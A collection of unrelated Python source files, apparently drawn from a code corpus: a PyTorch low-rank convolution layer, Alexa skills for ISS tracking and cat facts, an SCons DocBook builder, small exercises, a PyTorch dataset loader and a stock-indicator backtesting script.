self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(self.row_weights,self.conv_weights.reshape(self.filters//self.times,-1)))\
.reshape(self.filters-self.filters//self.times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\
bias=self.bias, padding=self.padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\
padding=self.padding, stride=self.stride)
#count FLOPs
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
# ops per output element
# kernel_mul = kh * kw * cin
# kernel_add = kh * kw * cin - 1
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
# total ops
# num_out_elements = y.numel()
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
# per output element
total_mul_1 = m.filters//m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw) # (m.filters - m.filters//m.times)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters//m.times) * (cin * kh * kw) # (m.filters - m.filters//m.times)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 + total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
|
426 | 726f133bcf592315c42f8701be8308422ffbf0d9 |
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import reverse_geocoder as rg
from geopy import distance
from geopy.geocoders import Nominatim
import requests
import time
'''
:::::::: ::::::::: ::: :::::::: :::::::::: ::: ::: ::: ::: ::: ::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#++:++#++ +#++:++#+ +#++:++#++: +#+ +#++:++# +#+ +:+ +#+ +#++:++#++: +#+ +#++:++ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#+# #+#+# #+# #+# #+# #+# #+#
######## ### ### ### ######## ########## ### ### ### ### ########## ### ### ###
'''
app = Flask(__name__)
ask = Ask(app, "/space_walk")
def find_ordinals(city, iss):
'''
Take tuple coordinates (lat, lon) for City and ISS and
find the cardinal direction of NE, SE, SW, NW
'''
if iss[0] - city[0] > 0:
a = 'North'
else:
a = 'South'
if iss[1] - city[1] > 0:
b = 'East'
else:
b = 'West'
return ''.join([a, b])
def where_is_the_iss_now():
iss_now_website = 'http://api.open-notify.org/iss-now.json'
webby = requests.get(iss_now_website)
data = webby.json()
if data['iss_position']:
longitude = data['iss_position'].get('longitude')
latitude = data['iss_position'].get('latitude')
results = rg.search((latitude, longitude), mode=1)
lat, lon, name, admin1, admin2, cc = results[0].values()
ordinal = find_ordinals(city=(float(lat), float(lon)), iss=(float(latitude), float(longitude)))
country_cc = requests.get(
'https://pkgstore.datahub.io/core/country-list/data_json/data/8c458f2d15d9f2119654b29ede6e45b8/data_json.json')
country_cc = country_cc.json()
iss_coordinates = (latitude, longitude)
k_nearest_coordinates = (lat, lon)
distance_miles = distance.distance(k_nearest_coordinates, iss_coordinates).miles
country_name = ''
for i in filter(lambda d: d.get('Code') == cc, country_cc):
country_name = i.get('Name')
location_text = ', '.join([name, admin1, country_name])
if distance_miles > 150:
answer = 'The International Space Station is {} miles {} off the coast of {}'.format(int(distance_miles), ordinal,
location_text)
else:
answer = 'the International Space Station is {} miles {} near {}'.format(int(distance_miles),ordinal, location_text)
return answer, latitude, longitude, distance_miles, ordinal, name, admin1, country_name
@app.route('/')
def homepage():
return ''
@ask.launch
def start_skill():
# welcome_message = 'Welcome to the Fleet Feet Journal! What is your name?'
welcome_message_reprompt = render_template('welcome_message_reprompt')
welcome_message = render_template('welcome_message')
return (question(welcome_message).reprompt(welcome_message_reprompt))
@ask.intent('YourLocation')
def pass_over(my_location):
geolocator = Nominatim(user_agent='my-application')
print(my_location)
location = geolocator.geocode(my_location,language='en-US')
try:
city = location.address.split(',')[0]
state = location.address.split(',')[2]
country = location.address.split(',')[-1]
location_name = ', '.join([city, state, country])
except IndexError:
location_name = location.address.split(',')[-1]
fly_over = requests.get(
'http://api.open-notify.org/iss-pass.json?lat={}&lon={}'.format(location.latitude, location.longitude))
fly_over = fly_over.json()
if fly_over['message'] == 'success':
rise = fly_over['response'][0]
answer = time.strftime('%A, %B %d, %Y at %I:%M %p GMT', time.localtime(rise.get('risetime')))
a = rise.get('risetime') # last epoch recorded
b = time.time() # current epoch time
c = a - b # returns seconds
hours = c // 3600 % 24
minutes = c // 60 % 60
minutes = int(minutes)
hours = int(hours)
if minutes == 1:
minorminutes = 'minute'
else: minorminutes = 'minutes'
if hours == 1:
hour_or_hours = 'hour'
else: hour_or_hours = 'hours'
if hours == 0:
time_til_rise = "{} {}".format(minutes, minorminutes)
else: time_til_rise = "{} {} and {} {}".format(hours, hour_or_hours, minutes, minorminutes)
else:
answer = "failure"
return statement('the next flyover for {} will begin in {} on {}'.format(location_name, time_til_rise, answer))
@ask.intent('WhereISS')
def share_location():
iss_location, latitude, longitude, distance_miles, ordinal, name, admin1, country_name= where_is_the_iss_now()
latitude, longitude, distance_miles = float(latitude), float(longitude), float(distance_miles)
return statement(iss_location).standard_card(
title="Location of the International Space Station",
text='Latitude {} and Longitude {},\n {} miles {} of {}, {} in {}'.format(round(latitude,2), round(longitude,2), round(distance_miles,0), ordinal, name, admin1, country_name))
@ask.intent('AMAZON.FallbackIntent')
def fallback():
to_continue = render_template('to_continue')
return question('Sorry, I am not sure what you asked me...{}'.format(to_continue))
@ask.intent('AMAZON.NavigateHomeIntent')
def go_home():
return question('et - phone home')
@ask.intent('AMAZON.HelpIntent')
def help_me():
help_me_text = render_template('help')
return question(help_me_text)
@ask.intent('Credits')
def speak_credits():
credits_ = render_template('credits')
return statement(credits_)
@ask.intent('AMAZON.StopIntent')
def stop():
bye_text = render_template('bye')
return statement(bye_text)
@ask.intent('AMAZON.CancelIntent')
def cancel():
bye_text = render_template('bye')
return statement(bye_text)
@ask.session_ended
def session_ended():
return "{}", 200
if __name__ == '__main__':
app.run(debug=True)
|
427 | cae49da8dd436fc51b472c4a88703d8bc6c79bda | import SCons.Util
import xml.dom.minidom, re, os.path
################################################################################
# DocBook pseudobuilder
# TODO: Only generate the output formats that are known
################################################################################
def generate(env) :
def remove_doctype(target, source, env) :
f = open(str(target[0]))
output = []
for line in f.readlines() :
output.append(re.sub("^<!DOCTYPE .*", "", line))
f.close()
f = open(str(target[0]), 'wb')
for line in output :
f.write(line)
f.close()
def buildDocBook(env, source) :
db_env = env.Clone()
db_env["XMLCATALOGS"] = [db_env["DOCBOOK_XML"]]
# PDF generation
fo = db_env.XSLT(os.path.splitext(source)[0] + ".fo", source,
XSLTSTYLESHEET = db_env["DOCBOOK_XSL_FO"])
pdf = db_env.FO(fo)
# HTML generation
db_env.XSLT(os.path.splitext(source)[0] + ".html", source,
XSLTSTYLESHEET = db_env["DOCBOOK_XSL_HTML"])
# WordPress generation
wp_params = [("wordpress.dir", env.get("DOCBOOK_WP_DIR", "../../wordpress"))]
wp_pdf_url = env.get("DOCBOOK_WP_PDF_URL", pdf[0].name)
if len(wp_pdf_url) > 0 :
wp_params.append(("pdf.url", wp_pdf_url))
wp_params.append(("pdf.icon", env.get("DOCBOOK_WP_PDF_ICON", "/icons/pdf.png")))
wp = db_env.XSLT(os.path.splitext(source)[0] + ".wp.php", source,
XSLTSTYLESHEET = db_env["DOCBOOK_XSL_WP"],
XSLTPARAMS = wp_params + env.get("XSLTPARAMS", []))
db_env.AddPostAction(wp, SCons.Action.Action(remove_doctype, cmdstr = "$FIXCOMSTR"))
env.AddMethod(buildDocBook, "DocBook")
def exists(env) :
return True
|
428 | c139cbc3e693d75ad196e10257ff3028aa835709 | # Complete the hurdleRace function below.
def hurdleRace(k, height):
if k < max(height):
return max(height) - k
return 0
print(hurdleRace(2, [2,5,4,5,2]))
|
429 | 77971b088a7e076e3bf6d7aa320981a50e7756ce | from flask import Flask
from flask_ask import Ask, statement, question, session
# import json, requests
import random
app = Flask(__name__)
ask = Ask(app, "/")
def get_cat_fact():
myFacts = [
"Cats should not be fed tuna exclusively, as it lacks taurine, an essential nutrient required for good feline health. Make sure you have the proper Pet supplies to keep your cat happy and healthy.",
"The strongest climber among the big cats, a leopard can carry prey twice its weight up a tree.",
"A catโs hearing is better than a dogโs. A cat can hear high-frequency sounds up to two octaves higher than a human.",
"Tylenol and chocolate are both poisionous to cats.",
"Cats have 30 teeth (12 incisors, 10 premolars, 4 canines, and 4 molars), while dogs have 42. Kittens have baby teeth, which are replaced by permanent teeth around the age of 7 months.",
"It has been scientifically proven that owning cats is good for our health and can decrease the occurrence of high blood pressure and other illnesses.",
"A cat canโt climb head first down a tree because every claw on a catโs paw points the same way. To get down from a tree, a cat must back down.",
"Cats are subject to gum disease and to dental caries. They should have their teeth cleaned by the vet or the cat dentist once a year.",
"A domestic cat can run at speeds of 30 mph.",
"Cat families usually play best in even numbers. Cats and kittens should be aquired in pairs whenever possible.",
"A catโs back is extremely flexible because it has up to 53 loosely fitting vertebrae. Humans only have 34.",
"The claws on the catโs back paws arenโt as sharp as the claws on the front paws because the claws in the back donโt retract and, consequently, become worn.",
"Cat paws act as tempetature regulators, shock absorbers, hunting and grooming tools, sensors, and more",
"Cats see six times better in the dark and at night than humans.",
"The cat's tail is used to maintain balance.",
"Cats have 300 million neurons; dogs have about 160 million",
"Both humans and cats have identical regions in the brain responsible for emotion.",
"The lightest cat on record is a blue point Himalayan called Tinker Toy, who weighed 1 pound, 6 ounces (616 g). Tinker Toy was 2.75 inches (7 cm) tall and 7.5 inches (19 cm) long.",
"An adult lion's roar can be heard up to five miles (eight kilometers) away.",
"You check your cats pulse on the inside of the back thigh, where the leg joins to the body. Normal for cats: 110-170 beats per minute.",
"The largest cat breed is the Ragdoll. Male Ragdolls weigh between 12 and 20 lbs (5.4-9.0 k). Females weigh between 10 and 15 lbs (4.5-6.8 k).",
"A cat's normal temperature varies around 101 degrees Fahrenheit.",
"Unlike other cats, lions have a tuft of hair at the end of their tails.",
"Cats donโt have sweat glands over their bodies like humans do. Instead, they sweat only through their paws.",
"The average cat food meal is the equivalent to about five mice.",
"The first official cat show in the UK was organised at Crystal Palace in 1871.",
"In just seven years, a single pair of cats and their offspring could produce a staggering total of 420,000 kittens."
]
fact = myFacts[random.ranint(0,len(myFacts)-1)]
return fact
@ask.launch
def start_skill():
welcome_message = 'Hello there, would you like to hear a cat fact?'
return question(welcome_message)
@ask.intent("YesIntent")
def share_headlines():
fact = get_cat_fact()
cat_fact = 'Did you know, ' + fact
return statement(cat_fact)
@ask.intent("NoIntent")
def no_intent():
bye_text = 'Ok! Have a wonderful day!'
return statement(bye_text)
if __name__ == '__main__':
app.run(debug=True)
|
430 | 124d7da330aa7c869320e10f4f89cc1c872f85f2 | import matplotlib.pyplot as plt
import sys
sys.path.append('coin_flipping_src')
from monte_carlo import monte_carlo
from probability import probability
plt.style.use('bmh')
x_coords = range(10)
probablility_results = [probability(x,10) for x in x_coords]
plt.plot(x_coords,probablility_results,linewidth = 2.5)
# plt.plot([0,1,2,3,4],[0.1, 0.3, 0.5, 0.1, 0.1],linewidth=2.5)
for _ in range(5):
plt.plot(x_coords,[monte_carlo(x,10,100) for x in x_coords],linewidth = 0.75)
# plt.plot([0,1,2,3,4],[0.3, 0.1, 0.4, 0.2, 0.1],linewidth=0.75)
# plt.plot([0,1,2,3,4],[0.2, 0.2, 0.3, 0.3, 0.2],linewidth=0.75)
plt.legend(['True','MC 1','MC 2','MC 3','MC 4','MC 5'])
plt.xlabel('Number of Heads')
plt.ylabel('Probability')
plt.title('True Distribution vs Monte Carlo Simulations for 10 Coin Flips')
plt.savefig('plot.png')
plt.show() |
431 | 502da0f0dafe42d3464fabb1d92ae1b0d7ef11f3 | # Check given matrix is valid sudoku or Not.
|
432 | 4e31c2a80bec77a1f5aafc8a91617fb4b2941788 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author: Andrรฉ Pacheco
E-mail: pacheco.comp@gmail.com
This file implements the methods and functions to load the image as a PyTorch dataset
If you find any bug or have some suggestion, please, email me.
"""
from PIL import Image
from torch.utils import data
import torchvision.transforms as transforms
class BuildDataset (data.Dataset):
"""
This the standard way to implement a dataset pipeline in PyTorch. We need to extend the torch.utils.data.Dataset
class and implement the following methods: __len__, __getitem__ and the constructor __init__
"""
def __init__(self, imgs_path, labels, extra_info=None, transform=None):
"""
The constructor gets the images path and their respectively labels and extra information (if it exists).
In addition, you can specify some transform operation to be carry out on the images.
It's important to note the images must match with the labels (an extra information if exist). For example, the
imgs_path[x]'s label must take place on labels[x].
Parameters:
:param imgs_path (list): a list of string containing the image paths
:param labels (list) a list of labels for each image
:param extra_info (list): a list of extra information regarding each image. If None, there is no information.
Defaul is None.
:param transform (torchvision.transforms.transforms.Compose): transform operations to be carry out on the images
"""
self.imgs_path = imgs_path
self.labels = labels
self.extra_info = extra_info
# if transform is None, we need to ensure that the PIL image will be transformed to tensor, otherwise we'll got
# an exception
if (transform is not None):
self.transform = transform
else:
self.transform = transforms.Compose([
transforms.Resize((224,224)),
transforms.ToTensor()
])
def __len__(self):
""" This method just returns the dataset size """
return len(self.imgs_path)
def __getitem__(self, item):
"""
It gets the image, labels and extra information (if it exists) according to the index informed in `item`.
It also performs the transform on the image.
:param item (int): an index in the interval [0, ..., len(img_paths)-1]
:return (tuple): a tuple containing the image, its label and extra information (if it exists)
"""
image = Image.open(self.imgs_path[item]).convert("RGB")
# Applying the transformations
image = self.transform(image)
img_name = self.imgs_path[item].split('/')[-1].split('.')[0]
# print(self.labels[item])
# print(self.extra_info[item])
if self.extra_info is None:
extra_info = []
else:
extra_info = self.extra_info[item]
if self.labels is None:
labels = []
else:
labels = self.labels[item]
return image, labels, extra_info, img_name
def get_data_loader (imgs_path, labels, extra_info=None, transform=None, params=None):
"""
This function gets a list og images path, their labels and extra information (if it exists) and returns a DataLoader
for these files. You also can set some transformations using torchvision.transforms in order to perform data
augmentation. Lastly, params is a dictionary that you can set the following parameters:
batch_size (int): the batch size for the dataset. If it's not informed the default is 30
shuf (bool): set it true if wanna shuffe the dataset. If it's not informed the default is True
num_workers (int): the number thread in CPU to load the dataset. If it's not informed the default is 0 (which
:param imgs_path (list): a list of string containing the images path
:param labels (list): a list of labels for each image
:param extra_info (list, optional): a list of extra information regarding each image. If it's None, it means there's
no extra information. Default is None
:param transform (torchvision.transforms, optional): use the torchvision.transforms.compose to perform the data
augmentation for the dataset. Alternatively, you can use the jedy.pytorch.utils.augmentation to perform the
augmentation. If it's None, none augmentation will be perform. Default is None
:param params (dictionary, optional): this dictionary contains the following parameters:
batch_size: the batch size. If the key is not informed or params = None, the default value will be 30
shuf: if you'd like to shuffle the dataset. If the key is not informed or params = None,
the default value will be True
num_workers: the number of threads to be used in CPU. If the key is not informed or params = None, the default
value will be 4
pin_memory = set it to True to Pytorch preload the images on GPU. If the key is not informed or params = None,
the default value will be True
:return (torch.utils.data.DataLoader): a dataloader with the dataset and the chose params
"""
dt = BuildDataset(imgs_path, labels, extra_info, transform)
# Checking the params values. If it's not defined in params of if params is None, the default values are described
# below:
batch_size = 30
shuf = True
num_workers = 4
pin_memory = True
# However, if the params is defined, we used the values described on it:
if (params is not None):
if ('batch_size' in params.keys()):
batch_size = params['batch_size']
if ('shuf' in params.keys()):
shuf = params['shuf']
if ('num_workers' in params.keys()):
num_workers = params['num_workers']
if ('pin_memory' in params.keys()):
pin_memory = params['pin_memory']
# Calling the dataloader
dl = data.DataLoader (dataset=dt, batch_size=batch_size, shuffle=shuf, num_workers=num_workers,
pin_memory=pin_memory)
return dl
|
433 | 6454790c98b254edeead4e68ef7f5760c9105a57 | #!/usr/bin/python
#
# Dividend!
#
import os
import sys
import urllib2
import math
import numpy
from pylab import *
#
# Dividend adjusted!
#
Use_Dividend_Adjusted = True
if ( Use_Dividend_Adjusted ):
readinIndex = 6
else:
readinIndex = 4
# Subplots in total
nsubplots = 5
iprice = 1
imacd = 2
#icci = 4
idmi = 3
ibalance = 4
igain = 5
# CCI parameters!!!
CCI_period = 20
# DMI parameters!!!
DMI_period = 14
name = str(sys.argv[1])
period = str(sys.argv[2])
time_range = int(sys.argv[3])
predict = bool(int(sys.argv[4]))
if (period == 'd'):
periodText = "days"
if (period == 'w'):
periodText = "weeks"
if (period == 'm'):
periodText = "months"
def Average(list):
r=0.0
for i in list:
r+=float(i)
return r/len(list)
def EMA(list):
r = 0.0
f = 0
for i in range(1, len(list) + 1):
r = r + float(list[i-1]) * ( len(list) + 1 - i )
f = f + i
return r / f
response = urllib2.urlopen('http://table.finance.yahoo.com/table.csv?s='+name+'&d=12&e=29&f=3014&g='+period+'&a=3&b=23&c=1000&ignore=.csv')
if not os.path.exists( 'figures' ):
os.makedirs( 'figures' )
html = response.read()
#print html
a = html.split('\n')
dmax = len(a) - 2 #Be careful here! One header line and One empty line in the end
if ( dmax < time_range ):
time_range = dmax - 1
a200 = []
date200 = []
avg12 = []
avg26 = []
dif = []
TP = []
TR = []
TR14 = []
HighP = []
LowP = []
DM_positive = []
DM_negative = []
DM14_positive = []
DM14_negative = []
DI14_positive = []
DI14_negative = []
DX = []
ADX = []
for i in range(dmax, 0, -1):
date200.append(a[i].split(',')[0])
a200.append(float(a[i].split(',')[readinIndex]))
# HighP.append( float(a[i].split(',')[2]) )
HighP.append( float(a[i].split(',')[2]) / float(a[i].split(',')[4]) * float(a[i].split(',')[6]) )
# LowP.append( float(a[i].split(',')[3]) )
LowP.append( float(a[i].split(',')[3]) / float(a[i].split(',')[4]) * float(a[i].split(',')[6]) )
CloseP = float(a[i].split(',')[readinIndex])
TP.append( (HighP[dmax - i] + LowP[dmax - i] + CloseP) / 3.0 )
if ( i < dmax ):
TR.append( max(HighP[dmax - i], a200[dmax - i - 1]) - min(LowP[dmax - i], a200[dmax - i - 1]) )
TR14.append( TR14[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + TR[dmax - i] / float(DMI_period) )
DM_positive.append( max(0, HighP[dmax - i] - HighP[dmax - i - 1]) )
DM_negative.append( max(0, LowP[dmax - i - 1] - LowP[dmax - i]) )
DM14_positive.append( DM14_positive[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + DM_positive[dmax - i] / float(DMI_period) )
DM14_negative.append( DM14_negative[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + DM_negative[dmax - i] / float(DMI_period) )
if ( TR14[dmax - i] == 0 ):
DI14_positive.append(0)
DI14_negative.append(0)
else:
DI14_positive.append( DM14_positive[dmax - i] / TR14[dmax - i] * 100 )
DI14_negative.append( DM14_negative[dmax - i] / TR14[dmax - i] * 100 )
if ( DI14_positive[dmax - i] + DI14_negative[dmax - i] == 0 ):
DX.append(0)
else:
DX.append( abs( DI14_positive[dmax - i] - DI14_negative[dmax - i] ) / ( DI14_positive[dmax - i] + DI14_negative[dmax - i] ) * 100 )
ADX.append( ADX[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + DX[dmax - i] / float(DMI_period) )
else:
TR.append( HighP[dmax - i] - LowP[dmax - i] )
TR14.append( TR[dmax - i] )
DM_positive.append(0)
DM_negative.append(0)
DM14_positive.append( DM_positive[dmax - i] )
DM14_negative.append( DM_negative[dmax - i] )
if ( TR14[dmax - i] == 0 ):
DI14_positive.append(0)
DI14_negative.append(0)
else:
DI14_positive.append( DM14_positive[dmax - i] / TR14[dmax - i] * 100 )
DI14_negative.append( DM14_negative[dmax - i] / TR14[dmax - i] * 100 )
if ( DI14_positive[dmax - i] + DI14_negative[dmax - i] == 0 ):
DX.append(0)
else:
DX.append( abs( DI14_positive[dmax - i] - DI14_negative[dmax - i] ) / ( DI14_positive[dmax - i] + DI14_negative[dmax - i] ) * 100 )
ADX.append( DX[dmax - i] )
# print HighP, LowP, CloseP
#a200.reverse()
#date200.reverse()
#TP.reverse()
a300 = []
for i in range(0, len(a200) ):
a200[i] = float(a200[i])
#print max(a200)
EMA12 = a200[0]
EMA26 = a200[0]
DIF = 0.0
DEA_old = 0.0
DEA_new = 0.0
DIF_array = []
DEA_array = []
#print html
MA_array = []
CCI_array = []
figure(1,(12,15))
# CCI Part
for i in range(0, dmax):
if ( i < CCI_period - 1 ):
MA = Average( TP[:i+1] )
MA_array.append(MA)
# MD = Average( [abs(x - y) for x, y in zip(MA_array[:i+1], TP[:i+1])] )
MD = Average( [abs(x - MA) for x in TP[:i+1]] )
else:
MA = Average( TP[i-19:i+1] )
MA_array.append(MA)
# MD = Average( [abs(x - y) for x, y in zip(MA_array[i-19:i+1], TP[i-19:i+1])] )
MD = Average( [abs(x - MA) for x in TP[i-19:i+1]] )
if ( i < CCI_period - 1 ):
CCI_array.append(0)
else:
CCI_array.append ( ( TP[i] - MA ) / MD / 0.015 )
# print TP[i], MA
# MACD Part
for i in range(1, dmax):
EMA12 = ( 2 * float(a200[i]) + 11 * EMA12 ) / 13
EMA26 = ( 2 * float(a200[i]) + 25 * EMA26 ) / 27
DIF = EMA12 - EMA26
DEA_new = DEA_old * 8 / 10 + DIF * 2 / 10
DIF_array.append(DIF)
DEA_array.append(DEA_new)
DEA_old = DEA_new
x = arange(1, dmax, 1)
#print len(x)
#DIF_array = x
#plot(x[400:], DIF_array[400:], x[400:], DEA_array[400:])
subplot(nsubplots,1,iprice)
plot(x[dmax-time_range-1:]-(dmax-time_range-1), a200[dmax - time_range:], 'k')
grid(True)
xindex = []
xdate = []
xinterval = 5
for i in range( 0, xinterval ):
xindex.append( int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1 )
xdate.append( str( date200[dmax - 1 - time_range + int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1] ) )
xindex.append( time_range )
xdate.append( str( date200[dmax - 1] ) )
xticks(xindex, xdate)
ylabel('PRICE (USD)', fontsize=16)
title(name.upper() + ' Price and Indices in the past ' + str(time_range) + ' ' + periodText, fontsize = 18 )
# Plot CCI
#subplot(nsubplots,1,icci)
#plot(x[dmax-time_range-1:]-(dmax-time_range-1), CCI_array[dmax - time_range:], 'k')
#grid(True)
#xticks(xindex, xdate)
#ylabel('CCI_20', fontsize=16)
# Plot DMI
subplot(nsubplots,1,idmi)
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DI14_positive[dmax - time_range:], 'b',linestyle=':')
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DI14_negative[dmax - time_range:], 'm', linestyle='--')
#plot(x[dmax-time_range-1:]-(dmax-time_range-1), DX[dmax - time_range:], 'g')
plot(x[dmax-time_range-1:]-(dmax-time_range-1), ADX[dmax - time_range:], 'k', linestyle='-')
grid(True)
xticks(xindex, xdate)
ylabel('DMI_14', fontsize=16)
lg = legend(['DI+', 'DI-', 'ADX'], loc='upper center', bbox_to_anchor=(1.049, 1.05))
subplot(nsubplots,1,imacd)
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DIF_array[dmax-time_range-1:], 'b')
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DEA_array[dmax-time_range-1:], 'r')
#xlabel('Date', fontsize=16)
ylabel('MACD (USD)', fontsize=16)
globalmin = min([min(DIF_array[dmax-time_range-1:]), min(DEA_array[dmax-time_range-1:])])
globalmax = max([max(DIF_array[dmax-time_range-1:]), max(DEA_array[dmax-time_range-1:])])
#for j in range( 0, 5):
# text(time_range - j * xinterval - float(time_range) / 40.0, globalmin - (globalmax - globalmin) * 0.2, date200[dmax-1-j * xinterval],color='blue')
lg = legend(['DIF', 'MACD'], loc='upper center')
lg.draw_frame(False)
grid(True)
xticks(xindex, xdate)
#xticks([i * 5 for i in range(1, time_range / 5)])
#title('[12, 26, 9] MACD Curves for ' + name.upper() + ' in the recent ' + str(time_range) + ' ' + periodText )
if ( predict == True):
cash = 1.0
ns = 0
nborrow = 0
ntrade = 0
ngain = 0
nloss = 0
total_gain = 0.0
total_loss = 0.0
top = []
itop = []
bottom = []
ibottom = []
iabove = 1
ibelow = 1
imax = 1
maxd = -99999.0
imin = 1
mind = 99999.0
imaxprice = 1
maxprice = -99999.0
iminprice = 1
minprice = 99999.0
above_active = False
below_active = False
found_low_MACD = False
found_low_ADX = False
last_low_MACD = 0
last_low_ADX = 0
real_high = False
total_vector = []
gain_result_vector = []
for i in range( dmax - 1 - time_range, dmax - 1):
total = cash + ns * float(a200[i+1]) - nborrow * float(a200[i+1])
total_vector.append( total )
gain_result = 0.0
# print i, " ", a200[i+1], " ", total, date200[i+1]
correct = False
buy = False
sell = False
DIF_slope = DIF_array[i] - DIF_array[i-1]
DEA_slope = DEA_array[i] - DEA_array[i-1]
if ( DIF_array[i-1] < DEA_array[i-1] and DIF_array[i-2] > DIF_array[i-1] and DIF_array[i] > DIF_array[i-1] ):
found_low_MACD = True
last_low_MACD = i
if ( DIF_slope < 0 and DIF_array[i-1] > DEA_array[i-1] and DIF_array[i] < DEA_array[i] ):
sell = True
subplot(nsubplots,1,imacd)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# Make decision based on CCI
# if ( CCI_array[i] < 100 and CCI_array[i+1] >= 100 ):
# buy = True
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# if ( CCI_array[i] > -100 and CCI_array[i+1] <= -100 ):
# sell = True
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# Make decision based on DMI
if ( ADX[i+1] < ADX[i] and ADX[i-1] < ADX[i] ):
found_low_ADX = True
if ( i - last_low_MACD <= 3 ):
buy = True
subplot(nsubplots,1,imacd)
axvline(x = last_low_MACD - (dmax-time_range-1) + 1, linewidth=1, color='g')
subplot(nsubplots,1,idmi)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# if ( DI14_positive[i] > DI14_negative[i] and DI14_positive[i+1] < DI14_negative[i+1] and ADX[i+1] >= 25 ):
# sell = True
# subplot(nsubplots,1,idmi)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
if ( buy ):
if ( nborrow > 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
ntrade = ntrade + 1
cash = cash - nborrow * float(a200[i+1])
if ( float(a200[i+1]) < borrow_price ):
ngain = ngain + 1
gain = nborrow * (borrow_price - float(a200[i+1]))
gain_result = gain
total_gain = total_gain + gain
# file.write(str(ntrade) + ' ' + str(gain) + '\n')
else:
nloss = nloss + 1
loss = nborrow * (borrow_price - float(a200[i+1]))
gain_result = loss
total_loss = total_loss + loss
# file.write(str(ntrade) + ' ' + str(loss) + '\n')
nborrow = 0
if ( ns == 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# subplot(nsubplots,1,iprice)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
ns = cash / float(a200[i+1])
if ( ns > 0 ):
cash = cash - ns * float(a200[i+1])
buy_price = float(a200[i+1])
buy_date = i - (dmax-time_range-1) + 1
if ( sell ):
if ( ns > 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,iprice)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# print 'Bought on ', date200[(dmax-time_range-1) + buy_date], ' @ ', buy_price, '; Sell on ', date200[i+1], ' @ ', a200[i+1]
ntrade = ntrade + 1
cash = cash + ns * float(a200[i+1])
if ( float(a200[i+1]) > buy_price ):
ngain = ngain + 1
gain = ns * (float(a200[i+1]) - buy_price)
gain_result = gain
total_gain = total_gain + gain
# file.write(str(ntrade) + ' ' + str(gain) + '\n')
else:
nloss = nloss + 1
loss = ns * (float(a200[i+1]) - buy_price)
gain_result = loss
total_loss = total_loss + loss
# file.write(str(ntrade) + ' ' + str(loss) + '\n')
ns = 0
if ( nborrow == 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,iprice)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
nborrow = cash / float(a200[i+1])
if ( nborrow > 0 ):
cash = cash + nborrow * float(a200[i+1])
borrow_price = float(a200[i+1])
borrow_date = i - (dmax-time_range-1) + 1
gain_result_vector.append( gain_result )
# file.close()
